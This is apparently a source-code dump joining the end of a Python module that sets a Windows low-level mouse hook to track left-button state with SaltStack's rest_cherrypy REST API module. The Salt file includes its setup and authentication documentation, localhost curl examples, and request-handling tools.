        self._left_is_down = False

    def _left_down_slot(self):
        self._left_is_down = True

    @property
    def left_is_down(self):
        return self._left_is_down
# Module-level singleton; import this object to connect to the mouse signals.
MouseSignaler = _MouseSignaler()

@LowLevelMouseProc
def LLMouseProc(nCode, wParam, lParam):
    # Low-level mouse hook callback: forward left-button transitions to the
    # Qt signaler, then pass the event down the hook chain.
    msg = cast(lParam, LPMSLLHOOKSTRUCT)[0]
    if nCode == HC_ACTION:
        # msgid = MSG_TEXT.get(wParam, str(wParam))
        if wParam == WM_LBUTTONUP:
            MouseSignaler.left_up.emit()
        elif wParam == WM_LBUTTONDOWN:
            MouseSignaler.left_down.emit()
        # msg = ((msg.pt.x, msg.pt.y),
        #        msg.mouseData, msg.flags,
        #        msg.time, msg.dwExtraInfo)
        # print('{:15s}: {}'.format(msgid, msg))
    return user32.CallNextHookEx(None, nCode, wParam, lParam)

# Installs the hook for all threads (dwThreadId=0) as a side effect of
# importing this module.  NOTE(review): a message loop must still run in the
# installing thread for callbacks to fire — TODO confirm the host app pumps one.
hHook = user32.SetWindowsHookExW(WH_MOUSE_LL, LLMouseProc, None, 0)
# def mouse_msg_loop():
# hHook = user32.SetWindowsHookExW(WH_MOUSE_LL, LLMouseProc, None, 0)
# msg = MSG()
# while True:
# bRet = user32.GetMessageW(byref(msg), None, 0, 0)
# if not bRet:
# break
# if bRet == -1:
# raise WinError(get_last_error())
# user32.TranslateMessage(byref(msg))
# user32.DispatchMessageW(byref(msg))
# if __name__ == '__main__':
# import time
# import threading
# t = threading.Thread(target=mouse_msg_loop)
# t.start()
# while True:
# try:
# time.sleep(1)
# except KeyboardInterrupt:
# user32.PostThreadMessageW(t.ident, WM_QUIT, 0, 0)
# break
|
app.py | """
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
                "delvol_on_destroy": true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
import time
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warning(
"Import of cherrypy.cpstats failed. Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warning("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
    """
    Bypass the normal handler and serve HTML for all URLs

    The ``app_path`` setting must be non-empty and the request must ask for
    ``text/html`` in the ``Accept`` header.
    """
    opts = cherrypy.config["apiopts"]
    req = cherrypy.request

    # Nothing to serve when no HTML app is configured.
    if "app" not in opts:
        return

    # Never hijack requests for the app itself or its static assets.
    skip_prefixes = (
        opts.get("app_path", "/app"),
        opts.get("static_path", "/static"),
    )
    if req.path_info.startswith(skip_prefixes):
        return

    # A wildcard Accept header is treated as an API client, not a browser.
    if req.headers.get("Accept") == "*/*":
        return

    try:
        preferred = cherrypy.lib.cptools.accept("text/html")
    except cherrypy.HTTPError:
        return

    if preferred != "text/html":
        return

    raise cherrypy.InternalRedirect(opts.get("app_path", "/app"))
def salt_token_tool():
    """
    If the custom authentication header is supplied, put it in the cookie dict
    so the rest of the session-based auth works as intended
    """
    token = cherrypy.request.headers.get("X-Auth-Token", None)

    # The explicit header wins over any existing session cookie.
    if token:
        cherrypy.request.cookie["session_id"] = token
def salt_api_acl_tool(username, request):
    """
    .. versionadded:: 2016.3.0

    Verifies user requests against the API whitelist. (User/IP pair)
    in order to provide whitelisting for the API similar to the
    master, but over the API.

    .. code-block:: yaml

        rest_cherrypy:
            api_acl:
                users:
                    '*':
                        - 1.1.1.1
                        - 1.1.1.2
                    foo:
                        - 8.8.4.4
                    bar:
                        - '*'

    :param username: Username to check against the API.
    :type username: str
    :param request: Cherrypy request to check against the API.
    :type request: cherrypy.request
    """
    failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
    success_str = "[api_acl] Authentication successful for user %s from IP %s"
    pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"

    # Dig the ACL out of the master configuration, if one is present.
    acl = None
    salt_config = cherrypy.config.get("saltopts", None)
    if salt_config:
        cherrypy_conf = salt_config.get("rest_cherrypy", None)
        if cherrypy_conf:
            acl = cherrypy_conf.get("api_acl", None)

    ip = request.remote.ip

    # No ACL configured at all: requests pass unchecked.
    if not acl:
        logger.info(pass_str, username, ip)
        return True

    users = acl.get("users", {})
    if not users:
        # Preserves historical behavior: an ACL with no user entries
        # returns None (falsy) without logging.
        return None

    # Use the user's own entry when present, else fall back to the
    # wildcard entry.
    if username in users:
        allowed_ips = users[username]
    elif "*" in users:
        allowed_ips = users["*"]
    else:
        logger.info(failure_str, username, ip)
        return False

    if ip in allowed_ips or "*" in allowed_ips:
        logger.info(success_str, username, ip)
        return True

    logger.info(failure_str, username, ip)
    return False
def salt_ip_verify_tool():
    """
    If there is a list of restricted IPs, verify current
    client is coming from one of those IPs.
    """
    # This is overly cumbersome and crude,
    # But, it's also safe... ish...
    salt_config = cherrypy.config.get("saltopts", None)
    if not salt_config:
        return

    cherrypy_conf = salt_config.get("rest_cherrypy", None)
    if not cherrypy_conf:
        return

    auth_ip_list = cherrypy_conf.get("authorized_ips", None)
    if not auth_ip_list:
        return

    logger.debug("Found IP list: %s", auth_ip_list)
    rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
    logger.debug("Request from IP: %s", rem_ip)

    if rem_ip not in auth_ip_list:
        logger.error("Blocked IP: %s", rem_ip)
        raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
    """
    Redirect all unauthenticated requests to the login page
    """
    # No token in the session means the client has not logged in yet.
    if "token" not in cherrypy.session:  # pylint: disable=W8601
        raise cherrypy.HTTPError(401)

    # Session is authenticated; inform caches
    cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
    """
    Handle both simple and complex CORS requests

    Add CORS headers to each response. If the request is a CORS preflight
    request swap out the default handler with a simple, single-purpose handler
    that verifies the request and provides a valid CORS response.
    """
    req_headers = cherrypy.request.headers
    resp_headers = cherrypy.response.headers

    # Headers required for 'simple' CORS, set on every response.
    resp_headers["Access-Control-Allow-Origin"] = req_headers.get("Origin", "*")
    # NOTE(review): this value lists HTTP methods, but Expose-Headers normally
    # carries response *header names* -- looks like a copy/paste slip; confirm
    # intent before changing (kept as-is to preserve behavior).
    resp_headers["Access-Control-Expose-Headers"] = "GET, POST"
    resp_headers["Access-Control-Allow-Credentials"] = "true"

    # Anything other than a preflight goes through the normal handler chain.
    if cherrypy.request.method != "OPTIONS":
        return

    # Non-simple CORS preflight request; answer it here and short-circuit
    # the normal handler.
    requested_method = req_headers.get("Access-Control-Request-Method", None)
    allowed_methods = ["GET", "POST"]
    allowed_headers = [
        "Content-Type",
        "X-Auth-Token",
        "X-Requested-With",
    ]
    if requested_method and requested_method in allowed_methods:
        resp_headers["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
        resp_headers["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
        resp_headers["Connection"] = "keep-alive"
        resp_headers["Access-Control-Max-Age"] = "1400"

    # CherryPy on Py3 expects a bytes response body.
    cherrypy.response.body = b""
    cherrypy.response.status = 200
    # CORS requests should short-circuit the other tools.
    cherrypy.serving.request.handler = None

    # Needed to avoid the auth_tool check.
    if cherrypy.request.config.get("tools.sessions.on", False):
        cherrypy.session["token"] = True
    return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
# JSON is listed first, so it wins when the Accept header expresses no
# preference. Consumed by hypermedia_handler via cherrypy.response.processors.
ct_out_map = (
    ("application/json", salt.utils.json.dumps),
    (
        "application/x-yaml",
        functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
    ),
)
def hypermedia_handler(*args, **kwargs):
    """
    Determine the best output format based on the Accept header, execute the
    regular handler, and transform the output to the request content type (even
    if it's an error).

    :param args: Pass args through to the main handler
    :param kwargs: Pass kwargs through to the main handler
    """
    # Execute the real handler. Handle or pass-through any errors we know how
    # to handle (auth & HTTP errors). Reformat any errors we don't know how to
    # handle as a data structure.
    try:
        cherrypy.response.processors = dict(ct_out_map)
        # The real page handler was stashed here by hypermedia_out().
        ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
    # NOTE: clause order matters -- the specific Salt exceptions must be
    # listed before the broad `except Exception` fallback below.
    except (
        salt.exceptions.AuthenticationError,
        salt.exceptions.AuthorizationError,
        salt.exceptions.EauthAuthenticationError,
        salt.exceptions.TokenAuthenticationError,
    ):
        raise cherrypy.HTTPError(401)
    except salt.exceptions.SaltInvocationError:
        raise cherrypy.HTTPError(400)
    except (
        salt.exceptions.SaltDaemonNotRunning,
        salt.exceptions.SaltReqTimeoutError,
    ) as exc:
        raise cherrypy.HTTPError(503, exc.strerror)
    except salt.exceptions.SaltClientTimeout:
        raise cherrypy.HTTPError(504)
    except cherrypy.CherryPyException:
        # Let CherryPy's own errors (including HTTPError) propagate untouched.
        raise
    except Exception as exc:  # pylint: disable=broad-except
        # The TimeoutError exception class was removed in CherryPy in 12.0.0, but
        # Still check existence of TimeoutError and handle in CherryPy < 12.
        # The check was moved down from the SaltClientTimeout error line because
        # A one-line if statement throws a BaseException inheritance TypeError.
        if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
            raise cherrypy.HTTPError(504)

        import traceback

        logger.debug(
            "Error while processing request for: %s",
            cherrypy.request.path_info,
            exc_info=True,
        )

        cherrypy.response.status = 500

        # Full traceback is only exposed when the API runs in debug mode.
        ret = {
            "status": cherrypy.response.status,
            "return": "{}".format(traceback.format_exc())
            if cherrypy.config["debug"]
            else "An unexpected error occurred",
        }

    # Raises 406 if requested content-type is not supported
    best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])

    # Transform the output from the handler into the requested output format
    cherrypy.response.headers["Content-Type"] = best
    out = cherrypy.response.processors[best]
    try:
        response = out(ret)
        return salt.utils.stringutils.to_bytes(response)
    except Exception:  # pylint: disable=broad-except
        msg = "Could not serialize the return data from Salt."
        logger.debug(msg, exc_info=True)
        raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
    """
    Determine the best handler for the requested content type

    Wrap the normal handler and transform the output from that handler into the
    requested content type
    """
    req = cherrypy.serving.request
    # Stash the real handler so hypermedia_handler can invoke it later.
    req._hypermedia_inner_handler = req.handler

    # If handler has been explicitly set to None, don't override.
    if req.handler is not None:
        req.handler = hypermedia_handler
def process_request_body(fn):
    """
    A decorator to skip a processor function if process_request_body is False
    """

    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        # hypermedia_in() sets this flag to False for bodyless POSTs.
        if cherrypy.request.process_request_body is False:
            return
        fn(*args, **kwargs)

    return wrapped
def urlencoded_processor(entity):
    """
    Accept x-www-form-urlencoded data and reformat it into a Low State
    data structure.

    Since we can't easily represent complicated data structures with
    key-value pairs, any more complicated requirements (e.g. compound
    commands) must instead be delivered via JSON or YAML.

    For example::

    .. code-block:: bash

        curl -si localhost:8000 -d client=local -d tgt='*' \\
                -d fun='test.kwarg' -d arg='one=1' -d arg='two=2'

    :param entity: raw POST data
    """
    # cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
    # "body", so we have to handle parsing the tokens using parse_qsl
    raw = entity.read()
    try:
        raw = raw.decode("utf-8")
    except (UnicodeDecodeError, AttributeError):
        pass
    cherrypy.serving.request.raw_body = raw

    parsed = {}
    for field, value in parse_qsl(raw):
        parsed.setdefault(field, []).append(value)

    # Collapse single-valued fields to scalars; repeated fields stay lists.
    for field, values in parsed.items():
        if len(values) == 1:
            parsed[field] = values[0]
        elif not values:
            # Defensive only: setdefault/append above never leaves an
            # empty list here.
            parsed[field] = ""

    cherrypy.serving.request.unserialized_data = parsed
@process_request_body
def json_processor(entity):
    """
    Unserialize raw POST data in JSON format to a Python data structure.

    :param entity: raw POST data
    """
    # Read through a BytesIO buffer; see
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())
    del buf

    try:
        cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
    except ValueError:
        raise cherrypy.HTTPError(400, "Invalid JSON document")

    cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
    """
    Unserialize raw POST data in YAML format to a Python data structure.

    :param entity: raw POST data
    """
    # Read through a BytesIO buffer; see
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())

    try:
        cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
    except ValueError:
        # NOTE(review): PyYAML parse failures raise yaml.YAMLError, which is
        # not a ValueError subclass -- malformed YAML may bypass this 400 and
        # surface as a 500 instead. Confirm and widen this except if so.
        raise cherrypy.HTTPError(400, "Invalid YAML document")

    cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
    """
    Attempt to unserialize plain text as JSON

    Some large services still send JSON with a text/plain Content-Type. Those
    services are bad and should feel bad.

    :param entity: raw POST data
    """
    # Read through a BytesIO buffer; see
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())

    try:
        parsed = salt.utils.json.loads(body)
    except ValueError:
        # Not JSON after all; hand the raw text through unchanged.
        parsed = body

    cherrypy.serving.request.unserialized_data = parsed
    cherrypy.serving.request.raw_body = body
def hypermedia_in():
    """
    Unserialize POST/PUT data of a specified Content-Type.

    The following custom processors all are intended to format Low State data
    and will place that data structure into the request object.

    :raises HTTPError: if the request contains a Content-Type that we do not
        have a processor for
    """
    # Be liberal in what you accept
    ct_in_map = {
        "application/x-www-form-urlencoded": urlencoded_processor,
        "application/json": json_processor,
        "application/x-yaml": yaml_processor,
        "text/yaml": yaml_processor,
        "text/plain": text_processor,
    }

    req = cherrypy.request

    # Do not process the body for POST requests that have specified no content
    # or have not specified Content-Length
    if req.method.upper() == "POST" and req.headers.get("Content-Length", "0") == "0":
        req.process_request_body = False
        req.unserialized_data = None

    req.body.processors.clear()
    # Any Content-Type not listed in the map above is rejected outright.
    req.body.default_proc = cherrypy.HTTPError(406, "Content type not supported")
    req.body.processors = ct_in_map
def lowdata_fmt():
    """
    Validate and format lowdata from incoming unserialized request data

    This tool requires that the hypermedia_in tool has already been run.
    """
    if cherrypy.request.method.upper() != "POST":
        return

    data = cherrypy.request.unserialized_data

    # if the data was sent as urlencoded, we need to make it a list.
    # this is a very forgiving implementation as different clients set different
    # headers for form encoded data (including charset or something similar)
    if not (data and isinstance(data, Mapping)):
        # Already a list (JSON/YAML bodies) or empty; pass through untouched.
        cherrypy.serving.request.lowstate = data
        return

    # Make the 'arg' param a list if not already
    # pylint: disable=unsupported-membership-test
    if "arg" in data and not isinstance(data["arg"], list):
        data["arg"] = [data["arg"]]

    # Finally, make a Low State and put it in request
    cherrypy.request.lowstate = [data]
# Map each CherryPy hook point to the tools that must run there, in order.
